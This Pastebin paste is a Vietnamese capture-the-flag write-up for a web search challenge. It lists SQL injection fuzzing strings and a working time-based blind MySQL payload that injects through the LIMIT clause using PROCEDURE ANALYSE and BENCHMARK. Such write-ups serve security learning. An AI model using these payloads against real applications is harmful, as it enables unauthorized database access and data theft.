Advertisement
Guest User

Untitled

a guest
Apr 26th, 2015
453
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.57 KB | None | 0 0
  1. Web100: sju:pe search engines
  2. Một trang web search rất nà cơ bản nuôn :3
  3. Search thử xem post thì thu được kết quả như thế lầy:
  4. keyword=superfish&limit=2&find=Submit+Query
  5.  Ok đầu tiên mình thử fuzz sqli vào keyword trước, cụ thể:
  6. + keyword=superfish’-- -
  7. + keyword=superfish”-- -
  8. + keyword=superfish’)-- -
  9. + keyword=superfish”)-- -
  10. Không trả về kết quả, đoán rằng trường này đã bị filter bằng func mysql_real_escape_string
  11.  Cho qua
  12.  Fuzz limit:
  13. +limit=2 -- - => OK
  14. +limit=100 => OK
  15. +limit=2,1 => OK
  16. +limit= 2 offset 0 => OK
  17.  Ý đồ của tác giả chắc là injection ở đây rồi.
  18. Dựa theo kinh nghiệm sqli ở limit thì có 2 dạng, một là sử dụng select case, if else, 2 là sử dụng union based sqli, nhưng không thành công. Thôi thì qua thăm bác google vậy.
  19. Sau một thời gian quay tay với bác gúc thì cũng đã thành chánh quả :chaymau:
  20. Để giải quyết bài này mình sử dụng phương pháp Time based blind kết hợp Procedure Analyse:
  21. Tài liệu: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/
  22. Ok thử phát nào
  23. keyword=superfish&limit=1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)&find=Submit+Query
  24. alt + X (hackbar cho bạn nào không biết) và dơ ngón tay ra đếm, 1->2->3->4->5 ->bingo!
  25. Ok blind thôi:
  26. <đây là 1 đoạn python mì ăn liền chỉ có hiệu lực trong bài này>
  27. http://pastebin.com/g7cv7xXd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement